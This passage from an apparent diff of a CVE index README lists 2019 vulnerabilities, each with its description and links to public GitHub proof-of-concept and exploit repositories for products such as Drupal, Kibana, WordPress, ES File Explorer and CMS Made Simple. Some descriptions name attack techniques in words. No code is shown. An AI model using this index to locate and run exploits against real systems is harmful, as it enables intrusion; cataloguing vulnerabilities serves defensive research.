Debug interface, LPC2AHB bridge, PCIe BMC P2A bridge, and Watchdog setup. + + +- [nikitapbst/cve-2019-6260](https://github.com/nikitapbst/cve-2019-6260) + +### CVE-2019-6263 (2019-01-16) + +An issue was discovered in Joomla! before 3.9.2. Inadequate checks of the Global Configuration Text Filter settings allowed stored XSS. + + +- [praveensutar/CVE-2019-6263-Joomla-POC](https://github.com/praveensutar/CVE-2019-6263-Joomla-POC) + +### CVE-2019-6329 (2019-06-25) + +HP Support Assistant 8.7.50 and earlier allows a user to gain system privilege and allows unauthorized modification of directories or files. Note: A different vulnerability than CVE-2019-6328. + + +- [ManhNDd/CVE-2019-6329](https://github.com/ManhNDd/CVE-2019-6329) + +### CVE-2019-6339 (2019-01-22) + +In Drupal Core versions 7.x prior to 7.62, 8.6.x prior to 8.6.6 and 8.5.x prior to 8.5.9; A remote code execution vulnerability exists in PHP's built-in phar stream wrapper when performing file operations on an untrusted phar:// URI. Some Drupal code (core, contrib, and custom) may be performing file operations on insufficiently validated user input, thereby being exposed to this vulnerability. This vulnerability is mitigated by the fact that such code paths typically require access to an administrative permission or an atypical configuration. + + +- [Vulnmachines/drupal-cve-2019-6339](https://github.com/Vulnmachines/drupal-cve-2019-6339) + +### CVE-2019-6340 (2019-02-21) + +Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services module itself does not require an update at this time, but you should apply other contributed updates associated with this advisory if Services is in use.) + + +- [g0rx/Drupal-SA-CORE-2019-003](https://github.com/g0rx/Drupal-SA-CORE-2019-003) +- [knqyf263/CVE-2019-6340](https://github.com/knqyf263/CVE-2019-6340) +- [DevDungeon/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass](https://github.com/DevDungeon/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass) +- [oways/CVE-2019-6340](https://github.com/oways/CVE-2019-6340) +- [cved-sources/cve-2019-6340](https://github.com/cved-sources/cve-2019-6340) +- [josehelps/cve-2019-6340-bits](https://github.com/josehelps/cve-2019-6340-bits) +- [jas502n/CVE-2019-6340](https://github.com/jas502n/CVE-2019-6340) +- [ludy-dev/drupal8-REST-RCE](https://github.com/ludy-dev/drupal8-REST-RCE) +- [nobodyatall648/CVE-2019-6340](https://github.com/nobodyatall648/CVE-2019-6340) +- [Sumitpathania03/Drupal-cve-2019-6340](https://github.com/Sumitpathania03/Drupal-cve-2019-6340) + +### CVE-2019-6440 (2019-01-16) + +Zemana AntiMalware before 3.0.658 Beta mishandles update logic. + + +- [hexnone/CVE-2019-6440](https://github.com/hexnone/CVE-2019-6440) + +### CVE-2019-6446 (2019-01-16) + +An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources + + +- [RayScri/CVE-2019-6446](https://github.com/RayScri/CVE-2019-6446) + +### CVE-2019-6447 (2019-01-16) + +The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP. + + +- [fs0c131y/ESFileExplorerOpenPortVuln](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln) +- [SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447](https://github.com/SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447) +- [Nehal-Zaman/CVE-2019-6447](https://github.com/Nehal-Zaman/CVE-2019-6447) +- [n3rdh4x0r/CVE-2019-6447](https://github.com/n3rdh4x0r/CVE-2019-6447) +- [julio-cfa/POC-ES-File-Explorer-CVE-2019-6447](https://github.com/julio-cfa/POC-ES-File-Explorer-CVE-2019-6447) +- [febinrev/CVE-2019-6447-ESfile-explorer-exploit](https://github.com/febinrev/CVE-2019-6447-ESfile-explorer-exploit) +- [Kayky-cmd/CVE-2019-6447--.](https://github.com/Kayky-cmd/CVE-2019-6447--.) +- [VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer](https://github.com/VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer) +- [Osuni-99/CVE-2019-6447](https://github.com/Osuni-99/CVE-2019-6447) +- [Chethine/EsFileExplorer-CVE-2019-6447](https://github.com/Chethine/EsFileExplorer-CVE-2019-6447) +- [vino-theva/CVE-2019-6447](https://github.com/vino-theva/CVE-2019-6447) +- [KaviDk/CVE-2019-6447-in-Mobile-Application](https://github.com/KaviDk/CVE-2019-6447-in-Mobile-Application) +- [Cmadhushanka/CVE-2019-6447-Exploitation](https://github.com/Cmadhushanka/CVE-2019-6447-Exploitation) + +### CVE-2019-6453 (2019-02-18) + +mIRC before 7.55 allows remote command execution by using argument injection through custom URI protocol handlers. The attacker can specify an irc:// URI that loads an arbitrary .ini file from a UNC share pathname. Exploitation depends on browser-specific URI handling (Chrome is not exploitable). + + +- [proofofcalc/cve-2019-6453-poc](https://github.com/proofofcalc/cve-2019-6453-poc) +- [andripwn/mIRC-CVE-2019-6453](https://github.com/andripwn/mIRC-CVE-2019-6453) + +### CVE-2019-6467 (2019-10-09) + +A programming error in the nxdomain-redirect feature can cause an assertion failure in query.c if the alternate namespace used by nxdomain-redirect is a descendant of a zone that is served locally. The most likely scenario where this might occur is if the server, in addition to performing NXDOMAIN redirection for recursive clients, is also serving a local copy of the root zone or using mirroring to provide the root zone, although other configurations are also possible. Versions affected: BIND 9.12.0-> 9.12.4, 9.14.0. Also affects all releases in the 9.13 development branch. + + +- [knqyf263/CVE-2019-6467](https://github.com/knqyf263/CVE-2019-6467) + +### CVE-2019-6487 (2019-01-18) + +TP-Link WDR Series devices through firmware v3 (such as TL-WDR5620 V3.0) are affected by command injection (after login) leading to remote code execution, because shell metacharacters can be included in the weather get_weather_observe citycode field. + + +- [afang5472/TP-Link-WDR-Router-Command-injection_POC](https://github.com/afang5472/TP-Link-WDR-Router-Command-injection_POC) + +### CVE-2019-6690 (2019-03-17) + +python-gnupg 0.4.3 allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended. To perform the attack, the passphrase to gnupg must be controlled by the adversary and the ciphertext should be trusted. Related to a "CWE-20: Improper Input Validation" issue affecting the affect functionality component. + + +- [stigtsp/CVE-2019-6690-python-gnupg-vulnerability](https://github.com/stigtsp/CVE-2019-6690-python-gnupg-vulnerability) +- [brianwrf/CVE-2019-6690](https://github.com/brianwrf/CVE-2019-6690) + +### CVE-2019-6693 (2019-11-21) + +Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users' passwords (except the administrator's password), private keys' passphrases and High Availability password (when set). + + +- [gquere/CVE-2019-6693](https://github.com/gquere/CVE-2019-6693) +- [synacktiv/CVE-2020-9289](https://github.com/synacktiv/CVE-2020-9289) +- [saladandonionrings/cve-2019-6693](https://github.com/saladandonionrings/cve-2019-6693) + +### CVE-2019-6715 (2019-04-01) + +pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data. + + +- [random-robbie/cve-2019-6715](https://github.com/random-robbie/cve-2019-6715) + +### CVE-2019-7192 (2019-12-05) + +This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + + +- [cycraft-corp/cve-2019-7192-check](https://github.com/cycraft-corp/cve-2019-7192-check) +- [th3gundy/CVE-2019-7192_QNAP_Exploit](https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit) + +### CVE-2019-7213 (2019-04-24) + +SmarterTools SmarterMail 16.x before build 6985 allows directory traversal. An authenticated user could delete arbitrary files or could create files in new folders in arbitrary locations on the mail server. This could lead to command execution on the server for instance by putting files inside the web directories. + + +- [secunnix/CVE-2019-7213](https://github.com/secunnix/CVE-2019-7213) + +### CVE-2019-7214 (2019-04-24) + +SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch. + + +- [devzspy/CVE-2019-7214](https://github.com/devzspy/CVE-2019-7214) +- [andyfeili/-CVE-2019-7214](https://github.com/andyfeili/-CVE-2019-7214) + +### CVE-2019-7216 (2019-01-31) + +An issue was discovered in FileChucker 4.99e-free-e02. filechucker.cgi has a filter bypass that allows a malicious user to upload any type of file by using % characters within the extension, e.g., file.%ph%p becomes file.php. + + +- [Ekultek/CVE-2019-7216](https://github.com/Ekultek/CVE-2019-7216) + +### CVE-2019-7219 (2019-04-11) + +Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. + + +- [verifysecurity/CVE-2019-7219](https://github.com/verifysecurity/CVE-2019-7219) + +### CVE-2019-7238 (2019-03-21) + +Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control. + + +- [mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238) +- [jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238) +- [verctor/nexus_rce_CVE-2019-7238](https://github.com/verctor/nexus_rce_CVE-2019-7238) +- [magicming200/CVE-2019-7238_Nexus_RCE_Tool](https://github.com/magicming200/CVE-2019-7238_Nexus_RCE_Tool) +- [smallpiggy/CVE-2019-7238](https://github.com/smallpiggy/CVE-2019-7238) + +### CVE-2019-7304 (2019-04-23) + +Canonical snapd before version 2.37.1 incorrectly performed socket owner validation, allowing an attacker to run arbitrary commands as root. This issue affects: Canonical snapd versions prior to 2.37.1. + + +- [initstring/dirty_sock](https://github.com/initstring/dirty_sock) +- [SecuritySi/CVE-2019-7304_DirtySock](https://github.com/SecuritySi/CVE-2019-7304_DirtySock) +- [elvi7major/snap_priv_esc](https://github.com/elvi7major/snap_priv_esc) +- [f4T1H21/dirty_sock](https://github.com/f4T1H21/dirty_sock) + +### CVE-2019-7356 (2020-11-04) + +Subrion CMS v4.2.1 allows XSS via the panel/phrases/ VALUE parameter. + + +- [ngpentest007/CVE-2019-7356](https://github.com/ngpentest007/CVE-2019-7356) + +### CVE-2019-7357 (2020-11-10) + +Subrion CMS 4.2.1 has CSRF in panel/modules/plugins/. The attacker can remotely activate/deactivate the plugins. + + +- [ngpentest007/CVE-2019-7357](https://github.com/ngpentest007/CVE-2019-7357) + +### CVE-2019-7406 +- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo) + +### CVE-2019-7482 (2019-12-19) + +Stack-based buffer overflow in SonicWall SMA100 allows an unauthenticated user to execute arbitrary code in function libSys.so. This vulnerability impacted SMA100 version 9.0.0.3 and earlier. + + +- [singletrackseeker/CVE-2019-7482](https://github.com/singletrackseeker/CVE-2019-7482) +- [b4bay/CVE-2019-7482](https://github.com/b4bay/CVE-2019-7482) +- [w0lfzhang/sonicwall-cve-2019-7482](https://github.com/w0lfzhang/sonicwall-cve-2019-7482) + +### CVE-2019-7489 (2019-12-23) + +A vulnerability in SonicWall Email Security appliance allow an unauthenticated user to perform remote code execution. This vulnerability affected Email Security Appliance version 10.0.2 and earlier. + + +- [nromsdahl/CVE-2019-7489](https://github.com/nromsdahl/CVE-2019-7489) + +### CVE-2019-7609 (2019-03-25) + +Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + + +- [jas502n/kibana-RCE](https://github.com/jas502n/kibana-RCE) +- [mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609) +- [LandGrey/CVE-2019-7609](https://github.com/LandGrey/CVE-2019-7609) +- [hekadan/CVE-2019-7609](https://github.com/hekadan/CVE-2019-7609) +- [rhbb/CVE-2019-7609](https://github.com/rhbb/CVE-2019-7609) +- [dnr6419/CVE-2019-7609](https://github.com/dnr6419/CVE-2019-7609) +- [wolf1892/CVE-2019-7609](https://github.com/wolf1892/CVE-2019-7609) +- [Cr4ckC4t/cve-2019-7609](https://github.com/Cr4ckC4t/cve-2019-7609) +- [OliveiraaX/CVE-2019-7609-KibanaRCE](https://github.com/OliveiraaX/CVE-2019-7609-KibanaRCE) +- [Akshay15-png/CVE-2019-7609](https://github.com/Akshay15-png/CVE-2019-7609) + +### CVE-2019-7616 (2019-07-30) + +Kibana versions before 6.8.2 and 7.2.1 contain a server side request forgery (SSRF) flaw in the graphite integration for Timelion visualizer. An attacker with administrative Kibana access could set the timelion:graphite.url configuration option to an arbitrary URL. This could possibly lead to an attacker accessing external URL resources as the Kibana process on the host system. + + +- [random-robbie/CVE-2019-7616](https://github.com/random-robbie/CVE-2019-7616) + +### CVE-2019-7642 (2019-03-25) + +D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10). + + +- [xw77cve/CVE-2019-7642](https://github.com/xw77cve/CVE-2019-7642) + +### CVE-2019-7839 (2019-06-12) + +ColdFusion versions Update 3 and earlier, Update 10 and earlier, and Update 18 and earlier have a command injection vulnerability. Successful exploitation could lead to arbitrary code execution. + + +- [securifera/CVE-2019-7839](https://github.com/securifera/CVE-2019-7839) + +### CVE-2019-8014 (2019-08-20) + +Adobe Acrobat and Reader versions 2019.012.20035 and earlier, 2019.012.20035 and earlier, 2017.011.30142 and earlier, 2017.011.30143 and earlier, 2015.006.30497 and earlier, and 2015.006.30498 and earlier have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution . + + +- [f01965/CVE-2019-8014](https://github.com/f01965/CVE-2019-8014) + +### CVE-2019-8331 (2019-02-20) + +In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute. + + +- [Snorlyd/https-nj.gov---CVE-2019-8331](https://github.com/Snorlyd/https-nj.gov---CVE-2019-8331) +- [Thampakon/CVE-2019-8331](https://github.com/Thampakon/CVE-2019-8331) + +### CVE-2019-8341 (2019-02-15) + +An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing + + +- [adindrabkin/llama_facts](https://github.com/adindrabkin/llama_facts) + +### CVE-2019-8389 (2019-02-17) + +A file-read vulnerability was identified in the Wi-Fi transfer feature of Musicloud 1.6. By default, the application runs a transfer service on port 8080, accessible by everyone on the same Wi-Fi network. An attacker can send the POST parameters downfiles and cur-folder (with a crafted ../ payload) to the download.script endpoint. This will create a MusicPlayerArchive.zip archive that is publicly accessible and includes the content of any requested file (such as the /etc/passwd file). + + +- [shawarkhanethicalhacker/CVE-2019-8389](https://github.com/shawarkhanethicalhacker/CVE-2019-8389) + +### CVE-2019-8449 (2019-09-11) + +The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. + + +- [mufeedvh/CVE-2019-8449](https://github.com/mufeedvh/CVE-2019-8449) +- [r0lh/CVE-2019-8449](https://github.com/r0lh/CVE-2019-8449) + +### CVE-2019-8451 (2019-09-11) + +The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. + + +- [0xbug/CVE-2019-8451](https://github.com/0xbug/CVE-2019-8451) +- [ianxtianxt/CVE-2019-8451](https://github.com/ianxtianxt/CVE-2019-8451) +- [jas502n/CVE-2019-8451](https://github.com/jas502n/CVE-2019-8451) +- [h0ffayyy/Jira-CVE-2019-8451](https://github.com/h0ffayyy/Jira-CVE-2019-8451) + +### CVE-2019-8540 (2019-12-18) + +A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2, watchOS 5.2. A malicious application may be able to determine kernel memory layout. + + +- [maldiohead/CVE-2019-8540](https://github.com/maldiohead/CVE-2019-8540) + +### CVE-2019-8561 (2019-12-18) + +A logic issue was addressed with improved validation. This issue is fixed in macOS Mojave 10.14.4. A malicious application may be able to elevate privileges. + + +- [0xmachos/CVE-2019-8561](https://github.com/0xmachos/CVE-2019-8561) + +### CVE-2019-8591 (2019-12-18) + +A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1. An application may be able to cause unexpected system termination or write kernel memory. + + +- [jsherman212/used_sock](https://github.com/jsherman212/used_sock) + +### CVE-2019-8601 (2019-12-18) + +Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. + + +- [BadAccess11/CVE-2019-8601](https://github.com/BadAccess11/CVE-2019-8601) + +### CVE-2019-8605 (2019-12-18) + +A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1. A malicious application may be able to execute arbitrary code with system privileges. + + +- [1nteger-c/CVE-2019-8605](https://github.com/1nteger-c/CVE-2019-8605) + +### CVE-2019-8627 +- [maldiohead/CVE-2019-8627](https://github.com/maldiohead/CVE-2019-8627) + +### CVE-2019-8641 (2019-12-18) + +An out-of-bounds read was addressed with improved input validation. + + +- [chia33164/CVE-2019-8641-reproduction](https://github.com/chia33164/CVE-2019-8641-reproduction) + +### CVE-2019-8656 (2020-10-27) + +This was addressed with additional checks by Gatekeeper on files mounted through a network share. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. Extracting a zip file containing a symbolic link to an endpoint in an NFS mount that is attacker controlled may bypass Gatekeeper. + + +- [D00MFist/CVE-2019-8656](https://github.com/D00MFist/CVE-2019-8656) + +### CVE-2019-8781 (2019-12-18) + +A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15. An application may be able to execute arbitrary code with kernel privileges. + + +- [A2nkF/macOS-Kernel-Exploit](https://github.com/A2nkF/macOS-Kernel-Exploit) +- [TrungNguyen1909/CVE-2019-8781-macOS](https://github.com/TrungNguyen1909/CVE-2019-8781-macOS) + +### CVE-2019-8791 (2019-12-18) + +An issue existed in the parsing of URL schemes. This issue was addressed with improved URL validation. This issue is fixed in Shazam Android App Version 9.25.0, Shazam iOS App Version 12.11.0. Processing a maliciously crafted URL may lead to an open redirect. + + +- [ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792](https://github.com/ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792) + +### CVE-2019-8805 (2019-12-18) + +A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. This issue is fixed in macOS Catalina 10.15.1. An application may be able to execute arbitrary code with system privileges. + + +- [securelayer7/CVE-2019-8805](https://github.com/securelayer7/CVE-2019-8805) + +### CVE-2019-8852 (2020-10-27) + +A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. An application may be able to execute arbitrary code with kernel privileges. + + +- [pattern-f/CVE-2019-8852](https://github.com/pattern-f/CVE-2019-8852) + +### CVE-2019-8936 (2019-05-15) + +NTP through 4.2.8p12 has a NULL Pointer Dereference. + + +- [snappyJack/CVE-2019-8936](https://github.com/snappyJack/CVE-2019-8936) + +### CVE-2019-8942 (2019-02-20) + +WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. + + +- [brianwrf/WordPress_4.9.8_RCE_POC](https://github.com/brianwrf/WordPress_4.9.8_RCE_POC) +- [synacktiv/CVE-2019-8942](https://github.com/synacktiv/CVE-2019-8942) +- [synod2/WP_CROP_RCE](https://github.com/synod2/WP_CROP_RCE) +- [tuannq2299/CVE-2019-8942](https://github.com/tuannq2299/CVE-2019-8942) + +### CVE-2019-8943 (2019-02-20) + +WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring. + + +- [v0lck3r/CVE-2019-8943](https://github.com/v0lck3r/CVE-2019-8943) +- [hadrian3689/wordpress_cropimage](https://github.com/hadrian3689/wordpress_cropimage) + +### CVE-2019-8956 (2019-04-01) + +In the Linux Kernel before versions 4.20.8 and 4.19.21 a use-after-free error in the "sctp_sendmsg()" function (net/sctp/socket.c) when handling SCTP_SENDALL flag can be exploited to corrupt memory. + + +- [butterflyhack/CVE-2019-8956](https://github.com/butterflyhack/CVE-2019-8956) + +### CVE-2019-8978 (2019-05-14) + +An improper authentication vulnerability can be exploited through a race condition that occurs in Ellucian Banner Web Tailor 8.8.3, 8.8.4, and 8.9 and Banner Enterprise Identity Services 8.3, 8.3.1, 8.3.2, and 8.4, in conjunction with SSO Manager. This vulnerability allows remote attackers to steal a victim's session (and cause a denial of service) by repeatedly requesting the initial Banner Web Tailor main page with the IDMSESSID cookie set to the victim's UDCID, which in the case tested is the institutional ID. During a login attempt by a victim, the attacker can leverage the race condition and will be issued the SESSID that was meant for this victim. + + +- [SecKatie/CVE-2019-8978](https://github.com/SecKatie/CVE-2019-8978) + +### CVE-2019-8979 (2019-02-21) + +Kohana through 3.3.6 has SQL Injection when the order_by() parameter can be controlled. + + +- [elttam/ko7demo](https://github.com/elttam/ko7demo) + +### CVE-2019-8985 (2019-02-21) + +On Netis WF2411 with firmware 2.1.36123 and other Netis WF2xxx devices (possibly WF2411 through WF2880), there is a stack-based buffer overflow that does not require authentication. This can cause denial of service (device restart) or remote code execution. This vulnerability can be triggered by a GET request with a long HTTP "Authorization: Basic" header that is mishandled by user_auth->user_ok in /bin/boa. + + +- [Squirre17/CVE-2019-8985](https://github.com/Squirre17/CVE-2019-8985) + +### CVE-2019-8997 (2019-03-21) + +An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field. + + +- [nxkennedy/CVE-2019-8997](https://github.com/nxkennedy/CVE-2019-8997) + +### CVE-2019-9053 (2019-03-26) + +An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter. + + +- [SUNNYSAINI01001/46635.py_CVE-2019-9053](https://github.com/SUNNYSAINI01001/46635.py_CVE-2019-9053) +- [n3rdh4x0r/CVE-2019-9053](https://github.com/n3rdh4x0r/CVE-2019-9053) +- [maraspiras/46635.py](https://github.com/maraspiras/46635.py) +- [e-renna/CVE-2019-9053](https://github.com/e-renna/CVE-2019-9053) +- [zmiddle/Simple_CMS_SQLi](https://github.com/zmiddle/Simple_CMS_SQLi) +- [ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit](https://github.com/ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit) +- [pedrojosenavasperez/CVE-2019-9053-Python3](https://github.com/pedrojosenavasperez/CVE-2019-9053-Python3) +- [Mahamedm/CVE-2019-9053-Exploit-Python-3](https://github.com/Mahamedm/CVE-2019-9053-Exploit-Python-3) +- [im-suman-roy/CVE-2019-9053](https://github.com/im-suman-roy/CVE-2019-9053) +- [bthnrml/guncel-cve-2019-9053.py](https://github.com/bthnrml/guncel-cve-2019-9053.py) +- [kahluri/CVE-2019-9053](https://github.com/kahluri/CVE-2019-9053) +- [Doc0x1/CVE-2019-9053-Python3](https://github.com/Doc0x1/CVE-2019-9053-Python3) +- [fernandobortotti/CVE-2019-9053](https://github.com/fernandobortotti/CVE-2019-9053) +- [byrek/CVE-2019-9053](https://github.com/byrek/CVE-2019-9053) +- [davcwikla/CVE-2019-9053-exploit](https://github.com/davcwikla/CVE-2019-9053-exploit) +- [BjarneVerschorre/CVE-2019-9053](https://github.com/BjarneVerschorre/CVE-2019-9053) +- [Jason-Siu/CVE-2019-9053-Exploit-in-Python-3](https://github.com/Jason-Siu/CVE-2019-9053-Exploit-in-Python-3) +- [FedericoTorres233/CVE-2019-9053-Fixed](https://github.com/FedericoTorres233/CVE-2019-9053-Fixed) +- [Dh4nuJ4/SimpleCTF-UpdatedExploit](https://github.com/Dh4nuJ4/SimpleCTF-UpdatedExploit) +- [TeymurNovruzov/CVE-2019-9053-python3-remastered](https://github.com/TeymurNovruzov/CVE-2019-9053-python3-remastered) +- [jtoalu/CTF-CVE-2019-9053-GTFOBins](https://github.com/jtoalu/CTF-CVE-2019-9053-GTFOBins) +- [Azrenom/CMS-Made-Simple-2.2.9-CVE-2019-9053](https://github.com/Azrenom/CMS-Made-Simple-2.2.9-CVE-2019-9053) +- [louisthedonothing/CVE-2019-9053](https://github.com/louisthedonothing/CVE-2019-9053) + +### CVE-2019-9081 +- [nth347/CVE-2019-9081_PoC](https://github.com/nth347/CVE-2019-9081_PoC) +- [scopion/cve-2019-9081](https://github.com/scopion/cve-2019-9081) +- [qafdevsec/CVE-2019-9081_PoC](https://github.com/qafdevsec/CVE-2019-9081_PoC) + +### CVE-2019-9153 (2019-08-22) + +Improper Verification of a Cryptographic Signature in OpenPGP.js <=4.1.2 allows an attacker to forge signed messages by replacing its signatures with a "standalone" or "timestamp" signature. + + +- [ZenyWay/opgp-service-cve-2019-9153](https://github.com/ZenyWay/opgp-service-cve-2019-9153) + +### CVE-2019-9184 (2019-02-26) + +SQL injection vulnerability in the J2Store plugin 3.x before 3.3.7 for Joomla! allows remote attackers to execute arbitrary SQL commands via the product_option[] parameter. + + +- [cved-sources/cve-2019-9184](https://github.com/cved-sources/cve-2019-9184) + +### CVE-2019-9193 (2019-04-01) + +In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’. + + +- [wkjung0624/cve-2019-9193](https://github.com/wkjung0624/cve-2019-9193) +- [b4keSn4ke/CVE-2019-9193](https://github.com/b4keSn4ke/CVE-2019-9193) +- [chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7](https://github.com/chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7) +- [paulotrindadec/CVE-2019-9193](https://github.com/paulotrindadec/CVE-2019-9193) +- [geniuszlyy/CVE-2019-9193](https://github.com/geniuszlyy/CVE-2019-9193) +- [AxthonyV/CVE-2019-9193](https://github.com/AxthonyV/CVE-2019-9193) +- [A0be/CVE-2019-9193](https://github.com/A0be/CVE-2019-9193) + +### CVE-2019-9194 (2019-02-26) + +elFinder before 2.1.48 has a command injection vulnerability in the PHP connector. + + +- [cved-sources/cve-2019-9194](https://github.com/cved-sources/cve-2019-9194) + +### CVE-2019-9202 (2019-03-28) + +Nagios IM (component of Nagios XI) before 2.2.7 allows authenticated users to execute arbitrary code via API key issues. + + +- [polict/CVE-2019-9202](https://github.com/polict/CVE-2019-9202) + +### CVE-2019-9465 (2020-01-07) + +In the Titan M handling of cryptographic operations, there is a possible information disclosure due to an unusual root cause. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-10 Android ID: A-133258003 + + +- [alexbakker/CVE-2019-9465](https://github.com/alexbakker/CVE-2019-9465) +- [MichaelsPlayground/CVE-2019-9465](https://github.com/MichaelsPlayground/CVE-2019-9465) + +### CVE-2019-9506 (2019-08-14) + +The Bluetooth BR/EDR specification up to and including version 5.1 permits sufficiently low encryption key length and does not prevent an attacker from influencing the key length negotiation. This allows practical brute-force attacks (aka "KNOB") that can decrypt traffic and inject arbitrary ciphertext without the victim noticing. + + +- [francozappa/knob](https://github.com/francozappa/knob) + +### CVE-2019-9511 (2019-08-13) + +Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. + + +- [flyniu666/ingress-nginx-0.21-1.19.5](https://github.com/flyniu666/ingress-nginx-0.21-1.19.5) + +### CVE-2019-9580 (2019-03-09) + +In st2web in StackStorm Web UI before 2.9.3 and 2.10.x before 